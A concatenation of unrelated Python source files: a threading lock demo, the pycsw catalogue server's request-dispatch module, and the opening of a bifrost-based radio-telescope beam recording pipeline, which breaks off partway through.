filepath=filepath, check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log)
except Exception as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
|
thread_collision.py | '''
multi-threading (python3 version)
https://docs.python.org/3/library/threading.html
'''
from time import clock
import threading
THREADS=2
lock = threading.Lock()
A = 0
B = 0
C = 0
def test_globals():
global A, B, C
for i in range(1024*1024):
lock.acquire()
A += 1
B += 2
C = A + B
lock.release()
def main():
print( 'starting threading test')
starttime = clock()
threads = []
for i in range(THREADS):
t = threading.Thread( target=test_globals, args=() )
t.start()
threads.append( t )
for t in threads:
t.join()
print( clock()-starttime)
print('A:', A)
print('B:', B)
print('C:', C)
main() |
server.py | # -*- coding: utf-8 -*-
# =================================================================
#
# Authors: Tom Kralidis <tomkralidis@gmail.com>
# Angelos Tzotsos <tzotsos@gmail.com>
#
# Copyright (c) 2016 Tom Kralidis
# Copyright (c) 2015 Angelos Tzotsos
# Copyright (c) 2016 James Dickens
# Copyright (c) 2016 Ricardo Silva
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
import os
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import splitquery
from six.moves.urllib.parse import urlparse
from six import StringIO
from six.moves.configparser import SafeConfigParser
import sys
from time import time
import wsgiref.util
from pycsw.core.etree import etree
from pycsw import oaipmh, opensearch, sru
from pycsw.plugins.profiles import profile as pprofile
import pycsw.plugins.outputschemas
from pycsw.core import config, log, util
from pycsw.ogc.csw import csw2, csw3
LOGGER = logging.getLogger(__name__)
class Csw(object):
""" Base CSW server """
def __init__(self, rtconfig=None, env=None, version='3.0.0'):
""" Initialize CSW """
if not env:
self.environ = os.environ
else:
self.environ = env
self.context = config.StaticContext()
# Lazy load this when needed
# (it will permanently update global cfg namespaces)
self.sruobj = None
self.opensearchobj = None
self.oaipmhobj = None
# init kvp
self.kvp = {}
self.mode = 'csw'
self.asyncron = False
self.soap = False
self.request = None
self.exception = False
self.status = 'OK'
self.profiles = None
self.manager = False
self.outputschemas = {}
self.mimetype = 'application/xml; charset=UTF-8'
self.encoding = 'UTF-8'
self.pretty_print = 0
self.domainquerytype = 'list'
self.orm = 'django'
self.language = {'639_code': 'en', 'text': 'english'}
self.process_time_start = time()
# define CSW implementation object (default CSW3)
self.iface = csw3.Csw3(server_csw=self)
self.request_version = version
if self.request_version == '2.0.2':
self.iface = csw2.Csw2(server_csw=self)
self.context.set_model('csw')
# load user configuration
try:
LOGGER.info('Loading user configuration')
if isinstance(rtconfig, SafeConfigParser): # serialized already
self.config = rtconfig
else:
self.config = SafeConfigParser()
if isinstance(rtconfig, dict): # dictionary
for section, options in rtconfig.items():
self.config.add_section(section)
for k, v in options.items():
self.config.set(section, k, v)
else: # configuration file
import codecs
with codecs.open(rtconfig, encoding='utf-8') as scp:
self.config.readfp(scp)
except Exception as err:
msg = 'Could not load configuration'
LOGGER.exception('%s %s: %s', msg, rtconfig, err)
self.response = self.iface.exceptionreport(
'NoApplicableCode', 'service', msg)
return
# set server.home safely
# TODO: make this more abstract
self.config.set(
'server', 'home',
os.path.dirname(os.path.join(os.path.dirname(__file__), '..'))
)
self.context.pycsw_home = self.config.get('server', 'home')
self.context.url = self.config.get('server', 'url')
log.setup_logger(self.config)
LOGGER.info('running configuration %s', rtconfig)
LOGGER.debug('QUERY_STRING: %s', self.environ['QUERY_STRING'])
# set OGC schemas location
if not self.config.has_option('server', 'ogc_schemas_base'):
self.config.set('server', 'ogc_schemas_base',
self.context.ogc_schemas_base)
# set mimetype
if self.config.has_option('server', 'mimetype'):
self.mimetype = self.config.get('server', 'mimetype').encode()
# set encoding
if self.config.has_option('server', 'encoding'):
self.encoding = self.config.get('server', 'encoding')
# set domainquerytype
if self.config.has_option('server', 'domainquerytype'):
self.domainquerytype = self.config.get('server', 'domainquerytype')
# set XML pretty print
if (self.config.has_option('server', 'pretty_print') and
self.config.get('server', 'pretty_print') == 'true'):
self.pretty_print = 1
# set Spatial Ranking option
if (self.config.has_option('server', 'spatial_ranking') and
self.config.get('server', 'spatial_ranking') == 'true'):
util.ranking_enabled = True
# set language default
if self.config.has_option('server', 'language'):
try:
LOGGER.info('Setting language')
lang_code = self.config.get('server', 'language').split('-')[0]
self.language['639_code'] = lang_code
self.language['text'] = self.context.languages[lang_code]
except Exception as err:
LOGGER.exception('Could not set language: %s', err)
pass
LOGGER.debug('Configuration: %s.', self.config)
LOGGER.debug('Model: %s.', self.context.model)
# load user-defined mappings if they exist
if self.config.has_option('repository', 'mappings'):
# override default repository mappings
try:
import imp
module = self.config.get('repository', 'mappings')
if '/' in module: # filepath
modulename = '%s' % os.path.splitext(module)[0].replace(
os.sep, '.')
mappings = imp.load_source(modulename, module)
else: # dotted name
mappings = __import__(module, fromlist=[''])
LOGGER.info('Loading custom repository mappings '
'from %s', module)
self.context.md_core_model = mappings.MD_CORE_MODEL
self.context.refresh_dc(mappings.MD_CORE_MODEL)
except Exception as err:
LOGGER.exception('Could not load custom mappings: %s', err)
self.response = self.iface.exceptionreport(
'NoApplicableCode', 'service',
'Could not load repository.mappings')
# load outputschemas
LOGGER.info('Loading outputschemas')
for osch in pycsw.plugins.outputschemas.__all__:
output_schema_module = __import__(
'pycsw.plugins.outputschemas.%s' % osch)
mod = getattr(output_schema_module.plugins.outputschemas, osch)
self.outputschemas[mod.NAMESPACE] = mod
LOGGER.debug('Outputschemas loaded: %s.', self.outputschemas)
LOGGER.debug('Namespaces: %s', self.context.namespaces)
def expand_path(self, path):
""" return safe path for WSGI environments """
if 'local.app_root' in self.environ and not os.path.isabs(path):
return os.path.join(self.environ['local.app_root'], path)
else:
return path
def dispatch_wsgi(self):
""" WSGI handler """
if hasattr(self, 'response'):
return self._write_response()
LOGGER.debug('WSGI mode detected')
if self.environ['REQUEST_METHOD'] == 'POST':
try:
request_body_size = int(self.environ.get('CONTENT_LENGTH', 0))
except (ValueError):
request_body_size = 0
self.requesttype = 'POST'
self.request = self.environ['wsgi.input'].read(request_body_size)
LOGGER.debug('Request type: POST. Request:\n%s...\n', self.request[:100])
else: # it's a GET request
self.requesttype = 'GET'
self.request = wsgiref.util.request_uri(self.environ)
try:
query_part = splitquery(self.request)[-1]
self.kvp = dict(parse_qsl(query_part, keep_blank_values=True))
except AttributeError as err:
LOGGER.exception('Could not parse query string')
self.kvp = {}
LOGGER.debug('Request type: GET. Request:\n%s...\n', self.request[:100])
return self.dispatch()
def opensearch(self):
""" enable OpenSearch """
if not self.opensearchobj:
self.opensearchobj = opensearch.OpenSearch(self.context)
return self.opensearchobj
def sru(self):
""" enable SRU """
if not self.sruobj:
self.sruobj = sru.Sru(self.context)
return self.sruobj
def oaipmh(self):
""" enable OAI-PMH """
if not self.oaipmhobj:
self.oaipmhobj = oaipmh.OAIPMH(self.context, self.config)
return self.oaipmhobj
def dispatch(self, writer=sys.stdout, write_headers=True):
""" Handle incoming HTTP request """
error = 0
if self.requesttype == 'GET':
self.kvp = self.normalize_kvp(self.kvp)
version_202 = ('version' in self.kvp and
self.kvp['version'] == '2.0.2')
accept_version_202 = ('acceptversions' in self.kvp and
'2.0.2' in self.kvp['acceptversions'])
if version_202 or accept_version_202:
self.request_version = '2.0.2'
elif self.requesttype == 'POST':
if self.request.find(b'cat/csw/2.0.2') != -1:
self.request_version = '2.0.2'
elif self.request.find(b'cat/csw/3.0') != -1:
self.request_version = '3.0.0'
if (not isinstance(self.kvp, str) and 'mode' in self.kvp and
self.kvp['mode'] == 'sru'):
self.mode = 'sru'
self.request_version = '2.0.2'
LOGGER.info('SRU mode detected; processing request')
self.kvp = self.sru().request_sru2csw(self.kvp)
if (not isinstance(self.kvp, str) and 'mode' in self.kvp and
self.kvp['mode'] == 'oaipmh'):
self.mode = 'oaipmh'
self.request_version = '2.0.2'
LOGGER.info('OAI-PMH mode detected; processing request.')
self.oaiargs = dict((k, v) for k, v in self.kvp.items() if k)
self.kvp = self.oaipmh().request(self.kvp)
if self.request_version == '2.0.2':
self.iface = csw2.Csw2(server_csw=self)
self.context.set_model('csw')
# configure transaction support, if specified in config
self._gen_manager()
namespaces = self.context.namespaces
ops = self.context.model['operations']
constraints = self.context.model['constraints']
# generate domain model
# NOTE: We should probably avoid this sort of mutable state for WSGI
if 'GetDomain' not in ops:
ops['GetDomain'] = self.context.gen_domains()
# generate distributed search model, if specified in config
if self.config.has_option('server', 'federatedcatalogues'):
LOGGER.info('Configuring distributed search')
constraints['FederatedCatalogues'] = {'values': []}
for fedcat in self.config.get('server',
'federatedcatalogues').split(','):
LOGGER.debug('federated catalogue: %s', fedcat)
constraints['FederatedCatalogues']['values'].append(fedcat)
for key, value in self.outputschemas.items():
get_records_params = ops['GetRecords']['parameters']
get_records_params['outputSchema']['values'].append(
value.NAMESPACE)
get_records_by_id_params = ops['GetRecordById']['parameters']
get_records_by_id_params['outputSchema']['values'].append(
value.NAMESPACE)
if 'Harvest' in ops:
harvest_params = ops['Harvest']['parameters']
harvest_params['ResourceType']['values'].append(
value.NAMESPACE)
LOGGER.info('Setting MaxRecordDefault')
if self.config.has_option('server', 'maxrecords'):
constraints['MaxRecordDefault']['values'] = [
self.config.get('server', 'maxrecords')]
# load profiles
if self.config.has_option('server', 'profiles'):
self.profiles = pprofile.load_profiles(
os.path.join('pycsw', 'plugins', 'profiles'),
pprofile.Profile,
self.config.get('server', 'profiles')
)
for prof in self.profiles['plugins'].keys():
tmp = self.profiles['plugins'][prof](self.context.model,
namespaces,
self.context)
key = tmp.outputschema # to ref by outputschema
self.profiles['loaded'][key] = tmp
self.profiles['loaded'][key].extend_core(self.context.model,
namespaces,
self.config)
LOGGER.debug('Profiles loaded: %s' % list(self.profiles['loaded'].keys()))
# init repository
# look for tablename, set 'records' as default
if not self.config.has_option('repository', 'table'):
self.config.set('repository', 'table', 'records')
repo_filter = None
if self.config.has_option('repository', 'filter'):
repo_filter = self.config.get('repository', 'filter')
if self.config.has_option('repository', 'source'): # load custom repository
rs = self.config.get('repository', 'source')
rs_modname, rs_clsname = rs.rsplit('.', 1)
rs_mod = __import__(rs_modname, globals(), locals(), [rs_clsname])
rs_cls = getattr(rs_mod, rs_clsname)
try:
self.repository = rs_cls(self.context, repo_filter)
LOGGER.debug('Custom repository %s loaded (%s)', rs, self.repository.dbtype)
except Exception as err:
msg = 'Could not load custom repository %s: %s' % (rs, err)
LOGGER.exception(msg)
error = 1
code = 'NoApplicableCode'
locator = 'service'
text = 'Could not initialize repository. Check server logs'
else: # load default repository
self.orm = 'sqlalchemy'
from pycsw.core import repository
try:
LOGGER.info('Loading default repository')
self.repository = repository.Repository(
self.config.get('repository', 'database'),
self.context,
self.environ.get('local.app_root', None),
self.config.get('repository', 'table'),
repo_filter
)
LOGGER.debug(
'Repository loaded (local): %s.' % self.repository.dbtype)
except Exception as err:
msg = 'Could not load repository (local): %s' % err
LOGGER.exception(msg)
error = 1
code = 'NoApplicableCode'
locator = 'service'
text = 'Could not initialize repository. Check server logs'
if self.requesttype == 'POST':
LOGGER.debug('HTTP POST request')
LOGGER.debug('CSW version: %s', self.iface.version)
self.kvp = self.iface.parse_postdata(self.request)
if isinstance(self.kvp, str): # it's an exception
error = 1
locator = 'service'
text = self.kvp
if (self.kvp.find('the document is not valid') != -1 or
self.kvp.find('document not well-formed') != -1):
code = 'NoApplicableCode'
else:
code = 'InvalidParameterValue'
LOGGER.debug('HTTP Headers:\n%s.', self.environ)
LOGGER.debug('Parsed request parameters: %s', self.kvp)
if (not isinstance(self.kvp, str) and 'mode' in self.kvp and
self.kvp['mode'] == 'opensearch'):
self.mode = 'opensearch'
LOGGER.info('OpenSearch mode detected; processing request.')
self.kvp['outputschema'] = 'http://www.w3.org/2005/Atom'
if ((len(self.kvp) == 0 and self.request_version == '3.0.0') or
(len(self.kvp) == 1 and 'config' in self.kvp)):
LOGGER.info('Turning on default csw30:Capabilities for base URL')
self.kvp = {
'service': 'CSW',
'acceptversions': '3.0.0',
'request': 'GetCapabilities'
}
http_accept = self.environ.get('HTTP_ACCEPT', '')
if 'application/opensearchdescription+xml' in http_accept:
self.mode = 'opensearch'
self.kvp['outputschema'] = 'http://www.w3.org/2005/Atom'
if error == 0:
# test for the basic keyword values (service, version, request)
basic_options = ['service', 'request']
request = self.kvp.get('request', '')
own_version_integer = util.get_version_integer(
self.request_version)
if self.request_version == '2.0.2':
basic_options.append('version')
if self.request_version == '3.0.0' and 'version' not in self.kvp and self.requesttype == 'POST':
if 'service' not in self.kvp:
self.kvp['service'] = 'CSW'
basic_options.append('service')
self.kvp['version'] = self.request_version
basic_options.append('version')
for k in basic_options:
if k not in self.kvp:
if (k in ['version', 'acceptversions'] and
request == 'GetCapabilities'):
pass
else:
error = 1
locator = k
code = 'MissingParameterValue'
text = 'Missing keyword: %s' % k
break
# test each of the basic keyword values
if error == 0:
# test service
if self.kvp['service'] != 'CSW':
error = 1
locator = 'service'
code = 'InvalidParameterValue'
text = 'Invalid value for service: %s.\
Value MUST be CSW' % self.kvp['service']
# test version
kvp_version = self.kvp.get('version', '')
try:
kvp_version_integer = util.get_version_integer(kvp_version)
except Exception as err:
kvp_version_integer = 'invalid_value'
if (request != 'GetCapabilities' and
kvp_version_integer != own_version_integer):
error = 1
locator = 'version'
code = 'InvalidParameterValue'
text = ('Invalid value for version: %s. Value MUST be '
'2.0.2 or 3.0.0' % kvp_version)
# check for GetCapabilities acceptversions
if 'acceptversions' in self.kvp:
for vers in self.kvp['acceptversions'].split(','):
vers_integer = util.get_version_integer(vers)
if vers_integer == own_version_integer:
break
else:
error = 1
locator = 'acceptversions'
code = 'VersionNegotiationFailed'
text = ('Invalid parameter value in '
'acceptversions: %s. Value MUST be '
'2.0.2 or 3.0.0' %
self.kvp['acceptversions'])
# test request
if self.kvp['request'] not in \
self.context.model['operations']:
error = 1
locator = 'request'
if request in ['Transaction', 'Harvest']:
code = 'OperationNotSupported'
text = '%s operations are not supported' % request
else:
code = 'InvalidParameterValue'
text = 'Invalid value for request: %s' % request
if error == 1: # return an ExceptionReport
LOGGER.error('basic service options error: %s, %s, %s', code, locator, text)
self.response = self.iface.exceptionreport(code, locator, text)
else: # process per the request value
if 'responsehandler' in self.kvp:
# set flag to process asynchronously
import threading
self.asyncron = True
request_id = self.kvp.get('requestid', None)
if request_id is None:
import uuid
self.kvp['requestid'] = str(uuid.uuid4())
if self.kvp['request'] == 'GetCapabilities':
self.response = self.iface.getcapabilities()
elif self.kvp['request'] == 'DescribeRecord':
self.response = self.iface.describerecord()
elif self.kvp['request'] == 'GetDomain':
self.response = self.iface.getdomain()
elif self.kvp['request'] == 'GetRecords':
if self.asyncron: # process asynchronously
threading.Thread(target=self.iface.getrecords).start()
self.response = self.iface._write_acknowledgement()
else:
self.response = self.iface.getrecords()
elif self.kvp['request'] == 'GetRecordById':
self.response = self.iface.getrecordbyid()
elif self.kvp['request'] == 'GetRepositoryItem':
self.response = self.iface.getrepositoryitem()
elif self.kvp['request'] == 'Transaction':
self.response = self.iface.transaction()
elif self.kvp['request'] == 'Harvest':
if self.asyncron: # process asynchronously
threading.Thread(target=self.iface.harvest).start()
self.response = self.iface._write_acknowledgement()
else:
self.response = self.iface.harvest()
else:
self.response = self.iface.exceptionreport(
'InvalidParameterValue', 'request',
'Invalid request parameter: %s' % self.kvp['request']
)
LOGGER.info('Request processed')
if self.mode == 'sru':
LOGGER.info('SRU mode detected; processing response.')
self.response = self.sru().response_csw2sru(self.response,
self.environ)
elif self.mode == 'opensearch':
LOGGER.info('OpenSearch mode detected; processing response.')
self.response = self.opensearch().response_csw2opensearch(
self.response, self.config)
elif self.mode == 'oaipmh':
LOGGER.info('OAI-PMH mode detected; processing response.')
self.response = self.oaipmh().response(
self.response, self.oaiargs, self.repository,
self.config.get('server', 'url')
)
return self._write_response()
def getcapabilities(self):
""" Handle GetCapabilities request """
return self.iface.getcapabilities()
def describerecord(self):
""" Handle DescribeRecord request """
return self.iface.describerecord()
def getdomain(self):
""" Handle GetDomain request """
return self.iface.getdomain()
def getrecords(self):
""" Handle GetRecords request """
return self.iface.getrecords()
def getrecordbyid(self, raw=False):
""" Handle GetRecordById request """
return self.iface.getrecordbyid(raw)
def getrepositoryitem(self):
""" Handle GetRepositoryItem request """
return self.iface.getrepositoryitem()
def transaction(self):
""" Handle Transaction request """
return self.iface.transaction()
def harvest(self):
""" Handle Harvest request """
return self.iface.harvest()
def _write_response(self):
""" Generate response """
# set HTTP response headers and XML declaration
xmldecl = ''
appinfo = ''
LOGGER.info('Writing response.')
if hasattr(self, 'soap') and self.soap:
self._gen_soap_wrapper()
if etree.__version__ >= '3.5.0': # remove superfluous namespaces
etree.cleanup_namespaces(self.response,
keep_ns_prefixes=self.context.keep_ns_prefixes)
response = etree.tostring(self.response,
pretty_print=self.pretty_print,
encoding='unicode')
if (isinstance(self.kvp, dict) and 'outputformat' in self.kvp and
self.kvp['outputformat'] == 'application/json'):
self.contenttype = self.kvp['outputformat']
from pycsw.core.formats import fmt_json
response = fmt_json.xml2json(response,
self.context.namespaces,
self.pretty_print)
else: # it's XML
if 'outputformat' in self.kvp:
self.contenttype = self.kvp['outputformat']
else:
self.contenttype = self.mimetype
xmldecl = ('<?xml version="1.0" encoding="%s" standalone="no"?>'
'\n' % self.encoding)
appinfo = '<!-- pycsw %s -->\n' % self.context.version
if isinstance(self.contenttype, bytes):
self.contenttype = self.contenttype.decode()
s = (u'%s%s%s' % (xmldecl, appinfo, response)).encode(self.encoding)
LOGGER.debug('Response code: %s',
self.context.response_codes[self.status])
LOGGER.debug('Response:\n%s', s)
return [self.context.response_codes[self.status], s]
def _gen_soap_wrapper(self):
""" Generate SOAP wrapper """
LOGGER.info('Writing SOAP wrapper.')
node = etree.Element(
util.nspath_eval('soapenv:Envelope', self.context.namespaces),
nsmap=self.context.namespaces
)
schema_location_ns = util.nspath_eval('xsi:schemaLocation',
self.context.namespaces)
node.attrib[schema_location_ns] = '%s %s' % (
self.context.namespaces['soapenv'],
self.context.namespaces['soapenv']
)
node2 = etree.SubElement(
node, util.nspath_eval('soapenv:Body', self.context.namespaces))
if self.exception:
node3 = etree.SubElement(
node2,
util.nspath_eval('soapenv:Fault', self.context.namespaces)
)
node4 = etree.SubElement(
node3,
util.nspath_eval('soapenv:Code', self.context.namespaces)
)
etree.SubElement(
node4,
util.nspath_eval('soapenv:Value', self.context.namespaces)
).text = 'soap:Server'
node4 = etree.SubElement(
node3,
util.nspath_eval('soapenv:Reason', self.context.namespaces)
)
etree.SubElement(
node4,
util.nspath_eval('soapenv:Text', self.context.namespaces)
).text = 'A server exception was encountered.'
node4 = etree.SubElement(
node3,
util.nspath_eval('soapenv:Detail', self.context.namespaces)
)
node4.append(self.response)
else:
node2.append(self.response)
self.response = node
def _gen_manager(self):
""" Update self.context.model with CSW-T advertising """
if (self.config.has_option('manager', 'transactions') and
self.config.get('manager', 'transactions') == 'true'):
self.manager = True
self.context.model['operations_order'].append('Transaction')
self.context.model['operations']['Transaction'] = {
'methods': {'get': False, 'post': True},
'parameters': {}
}
schema_values = [
'http://www.opengis.net/cat/csw/2.0.2',
'http://www.opengis.net/cat/csw/3.0',
'http://www.opengis.net/wms',
'http://www.opengis.net/wmts/1.0',
'http://www.opengis.net/wfs',
'http://www.opengis.net/wfs/2.0',
'http://www.opengis.net/wcs',
'http://www.opengis.net/wps/1.0.0',
'http://www.opengis.net/sos/1.0',
'http://www.opengis.net/sos/2.0',
'http://www.isotc211.org/2005/gmi',
'urn:geoss:waf',
]
self.context.model['operations_order'].append('Harvest')
self.context.model['operations']['Harvest'] = {
'methods': {'get': False, 'post': True},
'parameters': {
'ResourceType': {'values': schema_values}
}
}
self.context.model['operations']['Transaction'] = {
'methods': {'get': False, 'post': True},
'parameters': {
'TransactionSchemas': {'values': sorted(schema_values)}
}
}
self.csw_harvest_pagesize = 10
if self.config.has_option('manager', 'csw_harvest_pagesize'):
self.csw_harvest_pagesize = int(
self.config.get('manager', 'csw_harvest_pagesize'))
def _test_manager(self):
""" Verify that transactions are allowed """
if self.config.get('manager', 'transactions') != 'true':
raise RuntimeError('CSW-T interface is disabled')
""" get the client first forwarded ip """
if 'HTTP_X_FORWARDED_FOR' in self.environ:
ipaddress = self.environ['HTTP_X_FORWARDED_FOR'].split(',')[0].strip()
else:
ipaddress = self.environ['REMOTE_ADDR']
if not self.config.has_option('manager', 'allowed_ips') or \
(self.config.has_option('manager', 'allowed_ips') and not
util.ipaddress_in_whitelist(ipaddress,
self.config.get('manager', 'allowed_ips').split(','))):
raise RuntimeError(
'CSW-T operations not allowed for this IP address: %s' % ipaddress)
def _cql_update_queryables_mappings(self, cql, mappings):
""" Transform CQL query's properties to underlying DB columns """
LOGGER.debug('Raw CQL text = %s', cql)
LOGGER.debug(str(list(mappings.keys())))
if cql is not None:
for key in mappings.keys():
try:
cql = cql.replace(key, mappings[key]['dbcol'])
except:
cql = cql.replace(key, mappings[key])
LOGGER.debug('Interpolated CQL text = %s.', cql)
return cql
def _process_responsehandler(self, xml):
""" Process response handler """
if self.kvp['responsehandler'] is not None:
LOGGER.info('Processing responsehandler %s' %
self.kvp['responsehandler'])
uprh = urlparse(self.kvp['responsehandler'])
if uprh.scheme == 'mailto': # email
import smtplib
LOGGER.debug('Email detected')
smtp_host = 'localhost'
if self.config.has_option('server', 'smtp_host'):
smtp_host = self.config.get('server', 'smtp_host')
body = ('Subject: pycsw %s results\n\n%s' %
(self.kvp['request'], xml))
try:
LOGGER.info('Sending email')
msg = smtplib.SMTP(smtp_host)
msg.sendmail(
self.config.get('metadata:main', 'contact_email'),
uprh.path, body
)
msg.quit()
LOGGER.debug('Email sent successfully.')
except Exception as err:
LOGGER.exception('Error processing email')
elif uprh.scheme == 'ftp':
import ftplib
LOGGER.debug('FTP detected.')
try:
LOGGER.info('Sending to FTP server.')
ftp = ftplib.FTP(uprh.hostname)
if uprh.username is not None:
ftp.login(uprh.username, uprh.password)
ftp.storbinary('STOR %s' % uprh.path[1:], StringIO(xml))
ftp.quit()
LOGGER.debug('FTP sent successfully.')
except Exception as err:
LOGGER.exception('Error processing FTP')
@staticmethod
def normalize_kvp(kvp):
"""Normalize Key Value Pairs.
This method will transform all keys to lowercase and leave values
unchanged, as specified in the CSW standard (see for example note
C on Table 62 - KVP Encoding for DescribeRecord operation request
of the CSW standard version 2.0.2)
:arg kvp: a mapping with Key Value Pairs
:type kvp: dict
:returns: A new dictionary with normalized parameters
"""
result = dict()
for name, value in kvp.items():
result[name.lower()] = value
return result
|
dr_beam.py | #!/usr/bin/env python
from __future__ import division, print_function
try:
range = xrange
except NameError:
pass
import os
import sys
import h5py
import json
import time
import numpy
import ctypes
import signal
import logging
import argparse
import threading
from functools import reduce
from datetime import datetime, timedelta
from mnc.common import *
from mnc.mcs import ImageMonitorPoint, MultiMonitorPoint, Client
from reductions import *
from operations import FileOperationsQueue
from monitoring import GlobalLogger
from control import PowerBeamCommandProcessor
from bifrost.address import Address
from bifrost.udp_socket import UDPSocket
from bifrost.packet_capture import PacketCaptureCallback, UDPCapture, DiskReader
from bifrost.ring import Ring
import bifrost.affinity as cpu_affinity
import bifrost.ndarray as BFArray
from bifrost.ndarray import copy_array
from bifrost.libbifrost import bf
from bifrost.proclog import ProcLog
from bifrost.memory import memcpy as BFMemCopy, memset as BFMemSet
from bifrost import asarray as BFAsArray
QUEUE = FileOperationsQueue()
class CaptureOp(object):
def __init__(self, log, sock, oring, nserver, beam0=1, ntime_gulp=250,
slot_ntime=25000, shutdown_event=None, core=None):
self.log = log
self.sock = sock
self.oring = oring
self.nserver = nserver
self.beam0 = beam0
self.ntime_gulp = ntime_gulp
self.slot_ntime = slot_ntime
if shutdown_event is None:
shutdown_event = threading.Event()
self.shutdown_event = shutdown_event
self.core = core
def shutdown(self):
self.shutdown_event.set()
def seq_callback(self, seq0, time_tag, navg, chan0, nchan, nbeam, hdr_ptr, hdr_size_ptr):
#print("++++++++++++++++ seq0 =", seq0)
#print(" time_tag =", time_tag)
time_tag *= 2*NCHAN # Seems to be needed now
hdr = {'time_tag': time_tag,
'seq0': seq0,
'chan0': chan0,
'cfreq0': chan0*CHAN_BW,
'bw': nchan*CHAN_BW,
'navg': navg,
'nbeam': nbeam,
'nchan': nchan,
'npol': 4,
'pols': 'XX,YY,CR,CI',
'complex': False,
'nbit': 32}
#print("******** HDR:", hdr)
hdr_str = json.dumps(hdr).encode()
# TODO: Can't pad with NULL because returned as C-string
#hdr_str = json.dumps(hdr).ljust(4096, '\0')
#hdr_str = json.dumps(hdr).ljust(4096, ' ')
header_buf = ctypes.create_string_buffer(hdr_str)
hdr_ptr[0] = ctypes.cast(header_buf, ctypes.c_void_p)
hdr_size_ptr[0] = len(hdr_str)
return 0
def main(self):
seq_callback = PacketCaptureCallback()
seq_callback.set_pbeam(self.seq_callback)
with UDPCapture("pbeam", self.sock, self.oring, self.nserver, self.beam0, 9000,
self.ntime_gulp, self.slot_ntime,
sequence_callback=seq_callback, core=self.core) as capture:
while not self.shutdown_event.is_set():
status = capture.recv()
if status in (1,4,5,6):
break
del capture
class DummyOp(object):
def __init__(self, log, sock, oring, nserver, beam0=1, ntime_gulp=250,
slot_ntime=25000, shutdown_event=None, core=None):
self.log = log
self.sock = sock
self.oring = oring
self.nserver = nserver
self.beam0 = beam0
self.ntime_gulp = ntime_gulp
self.slot_ntime = slot_ntime
if shutdown_event is None:
shutdown_event = threading.Event()
self.shutdown_event = shutdown_event
self.core = core
self.bind_proclog = ProcLog(type(self).__name__+"/bind")
self.out_proclog = ProcLog(type(self).__name__+"/out")
self.size_proclog = ProcLog(type(self).__name__+"/size")
self.perf_proclog = ProcLog(type(self).__name__+"/perf")
self.out_proclog.update( {'nring':1, 'ring0':self.oring.name})
self.size_proclog.update({'nseq_per_gulp': self.ntime_gulp})
def shutdown(self):
self.shutdown_event.set()
def main(self):
with self.oring.begin_writing() as oring:
navg = 24
tint = navg / CHAN_BW
tgulp = tint * self.ntime_gulp
nbeam = 1
chan0 = 1234
nchan = 16*192
npol = 4
ohdr = {'time_tag': int(int(time.time())*FS),
'seq0': 0,
'chan0': chan0,
'cfreq0': chan0*CHAN_BW,
'bw': nchan*CHAN_BW,
'navg': navg,
'nbeam': nbeam,
'nchan': nchan,
'npol': npol,
'pols': 'XX,YY,CR,CI',
'complex': False,
'nbit': 32}
ohdr_str = json.dumps(ohdr)
ogulp_size = self.ntime_gulp*nbeam*nchan*npol*4 # float32
oshape = (self.ntime_gulp,nbeam,nchan,npol)
self.oring.resize(ogulp_size)
prev_time = time.time()
with oring.begin_sequence(time_tag=ohdr['time_tag'], header=ohdr_str) as oseq:
while not self.shutdown_event.is_set():
with oseq.reserve(ogulp_size) as ospan:
curr_time = time.time()
reserve_time = curr_time - prev_time
prev_time = curr_time
odata = ospan.data_view(numpy.float32).reshape(oshape)
odata[...] = numpy.random.randn(*oshape)
curr_time = time.time()
while curr_time - prev_time < tgulp:
time.sleep(0.01)
curr_time = time.time()
curr_time = time.time()
process_time = curr_time - prev_time
prev_time = curr_time
self.perf_proclog.update({'acquire_time': -1,
'reserve_time': reserve_time,
'process_time': process_time,})
class SpectraOp(object):
def __init__(self, log, id, iring, ntime_gulp=250, guarantee=True, core=None):
self.log = log
self.iring = iring
self.ntime_gulp = ntime_gulp
self.guarantee = guarantee
self.core = core
self.client = Client(id)
self.bind_proclog = ProcLog(type(self).__name__+"/bind")
self.in_proclog = ProcLog(type(self).__name__+"/in")
self.size_proclog = ProcLog(type(self).__name__+"/size")
self.sequence_proclog = ProcLog(type(self).__name__+"/sequence0")
self.perf_proclog = ProcLog(type(self).__name__+"/perf")
self.in_proclog.update( {'nring':1, 'ring0':self.iring.name})
self.size_proclog.update({'nseq_per_gulp': self.ntime_gulp})
def main(self):
if self.core is not None:
cpu_affinity.set_core(self.core)
self.bind_proclog.update({'ncore': 1,
'core0': cpu_affinity.get_core(),})
# Setup the figure
## Import
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
from matplotlib.ticker import MultipleLocator
## Create
fig = plt.Figure(figsize=(6,6))
ax = fig.gca()
for iseq in self.iring.read(guarantee=self.guarantee):
ihdr = json.loads(iseq.header.tostring())
self.sequence_proclog.update(ihdr)
self.log.info("Spectra: Start of new sequence: %s", str(ihdr))
# Setup the ring metadata and gulp sizes
time_tag = ihdr['time_tag']
navg = ihdr['navg']
nbeam = ihdr['nbeam']
chan0 = ihdr['chan0']
nchan = ihdr['nchan']
chan_bw = ihdr['bw'] / nchan
npol = ihdr['npol']
pols = ihdr['pols']
